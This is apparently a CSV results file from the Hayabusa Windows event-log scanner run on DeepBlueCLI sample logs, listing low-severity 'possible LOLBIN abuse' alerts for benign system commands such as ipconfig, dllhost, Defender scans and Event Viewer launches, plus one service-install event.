2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
